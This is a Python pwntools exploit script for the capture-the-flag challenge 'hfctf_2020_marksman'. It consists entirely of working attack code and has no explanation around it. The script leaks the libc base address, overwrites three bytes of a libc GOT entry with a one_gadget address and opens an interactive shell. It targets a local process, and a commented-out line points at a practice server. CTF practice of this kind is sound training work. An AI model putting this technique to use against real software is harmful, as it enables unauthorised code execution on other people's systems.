# coding:utf8
from pwn import *
context(log_level = 'debug', terminal = ['tmux', 'splitw', '-h', '-p', '60'])
elf = ELF('hfctf_2020_marksman')
#libc = elf.libc
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)

def exploit():
    p = process('./hfctf_2020_marksman', env = {'LD_PRELOAD':'/lib/x86_64-linux-gnu/libc.so.6'})
    #p = remote('node3.buuoj.cn', 26069, env = {'LD_PRELOAD':'/lib/x86_64-linux-gnu/libc.so.6'})
    #p = remote('node3.buuoj.cn', 26069)

    p.recvuntil('near: ')
    libc_base = int(p.recv(14), 16) - libc.sym['puts']
    info("libc_base ==> " + hex(libc_base))
    one_gadget = libc_base + 0xe58bf
    info("one_gadget ==> " + hex(one_gadget))

    # 打libc的got表
    target = libc_base + 0x3eb0a8
    info("target ==> " + hex(target))

    p.recvuntil('shoot!shoot!\n')
    p.send(str(target) + '\n')
    #gdb.attach(p, 'b * $rebase(0xd63)\nc')
    p.sendlineafter('biang!\n', p64(one_gadget)[0])
    p.sendlineafter('biang!\n', p64(one_gadget)[1])
    p.sendlineafter('biang!\n', p64(one_gadget)[2])

    p.interactive()
    p.close()
if __name__ == '__main__':
    exploit()
